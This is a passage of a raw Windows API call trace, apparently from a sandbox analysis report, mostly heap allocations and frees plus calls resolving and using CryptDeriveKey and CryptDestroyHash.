(HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0241.461] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.461] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0241.462] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.462] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0241.462] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.463] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.463] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.464] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0241.464] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0241.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0241.465] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e514a8 [0241.465] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e514a8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0241.465] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.466] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a48 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.466] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.466] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0241.466] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87510, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87250) returned 1 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.467] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0241.467] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0241.468] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0241.468] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0241.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0241.469] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518b0 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.469] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0241.470] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0241.470] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.470] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.471] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0241.471] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0241.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.472] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0241.472] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0241.472] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0241.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0241.472] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0241.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69a28 [0241.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0241.473] CryptDestroyHash (hHash=0xa87510) returned 1 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0241.473] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0241.474] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0241.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0241.474] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0241.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0241.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0241.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51400 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0241.475] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0241.476] HeapFree (in: 